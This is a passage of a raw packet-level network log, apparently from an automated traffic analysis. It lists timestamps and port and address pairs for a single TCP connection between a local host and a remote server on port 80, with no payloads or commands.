                                                                                                  Dec 19, 2024 08:52:54.678046942 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.678077936 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.686391115 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.686433077 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.686515093 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.694681883 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.694813013 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.694873095 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.703025103 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.703200102 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.740658998 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.785842896 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.812680006 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.812756062 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.812886953 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.815196991 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.815273046 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.815371037 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.820296049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.820350885 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.820410967 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.825397015 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.825449944 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.825551033 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.830190897 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.830282927 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.830362082 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.835084915 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.835158110 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.835205078 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.839942932 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.840049982 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.840210915 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.844815969 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.844891071 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.844960928 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.849697113 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.849808931 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.850034952 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.854567051 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.854645014 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.854702950 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.859426975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.859498978 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.859563112 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.864285946 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.864408970 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.864475012 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.869209051 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.869316101 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.869483948 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.874047995 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.874134064 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.874188900 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.878881931 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.878977060 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.879034996 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.883754969 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.883843899 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.883898020 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.889030933 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.889108896 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.889166117 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.893520117 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.893606901 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.893666029 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.898375988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.898458958 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.898516893 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.903225899 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.903291941 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.903348923 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.004862070 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.004992008 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.005103111 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.006829977 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.006916046 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.007004976 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.010518074 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.012135983 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.012187958 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.012228966 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.015770912 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.015850067 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.015919924 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.019597054 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.019702911 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.019777060 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.023303986 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.023431063 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.023437977 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.026998043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.027086973 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.027164936 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.030411959 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.030499935 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.030599117 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.033853054 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.033978939 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.034035921 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.037488937 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.037561893 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.037566900 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.040781975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.040880919 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.040958881 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.044775963 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.044847012 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.044929028 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.047461987 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.047646046 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.047713041 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.050950050 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.051022053 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.051069975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.054285049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.054347992 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.054415941 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.057709932 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.057913065 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.058001995 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.061182022 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.061265945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.061276913 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.064558983 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.064660072 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.064754963 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.067989111 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.068058968 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.068134069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.071444035 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.071511984 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.071527958 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.074856043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.074953079 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.074981928 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.078258038 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.078330994 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.078380108 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.081723928 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.081757069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.081809998 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.085171938 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.085268974 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.085279942 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.088500977 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.088597059 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.088603973 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.091957092 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.092031002 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.092041016 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.095390081 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.095472097 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.095503092 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.098861933 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.098939896 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.098954916 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.102730989 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.102812052 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.102813005 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.105624914 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.105751038 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.105762005 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.109046936 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.109112024 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.109178066 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.112431049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.112524033 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.196993113 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.197077990 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.197158098 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.198369980 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.198477983 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.198523998 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.201375008 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.201456070 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.201509953 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.204123020 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.204312086 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.204361916 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.206907988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.206979990 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.207035065 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.209678888 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.209805012 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.209862947 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.212424994 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.212533951 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.212594032 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.215044975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.215226889 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.215282917 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.217674017 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.217803955 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.217858076 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.220212936 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.220267057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.220320940 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.222711086 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.222815037 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.222865105 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.225263119 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.225393057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.225452900 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.227612019 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.227824926 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.227885008 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.229995966 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.230107069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.230158091 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.232424974 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.232511044 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.232570887 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.234812975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.234931946 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.234988928 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.237113953 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.237226009 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.237286091 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.239412069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.239643097 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.239696026 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.241677046 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.241826057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.241882086 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.243969917 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.244080067 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.244129896 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.246267080 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.246371031 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.246433020 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.248574972 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.248724937 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.248781919 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.250840902 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.250938892 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.251063108 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.253218889 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.253294945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.253350019 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.255438089 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.255543947 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.255594969 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.257783890 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.257838964 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.257898092 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.259999037 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.260126114 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.260176897 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.262296915 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.262445927 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.262495995 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.264607906 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.264698982 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.264755964 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.266908884 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.267026901 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.267086029 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.269119024 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.269296885 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.269356966 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.271485090 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.271578074 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.271630049 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.273746014 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.273878098 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.273922920 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.276201963 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.276293993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.276345015 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.278289080 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.278404951 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.278450012 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.280551910 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.280674934 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.280716896 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.282892942 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.283016920 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.283066034 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.285131931 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.285299063 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.285343885 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.287416935 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.287538052 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.287590981 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.289791107 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.289871931 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.289917946 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.292021036 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.292124987 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.292166948 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.294306993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.294450045 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.294552088 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.296588898 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.296713114 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.296762943 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.298865080 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.299036980 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.299078941 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.301209927 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.301331043 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.301376104 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.303468943 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.303599119 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.303662062 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.305747032 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.305870056 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.305922031 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.308038950 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.308146000 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.308197021 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.310313940 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.310420990 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.310477018 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.312625885 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.312758923 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.312813044 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.315001965 CET8049705147.45.47.15192.168.2.5
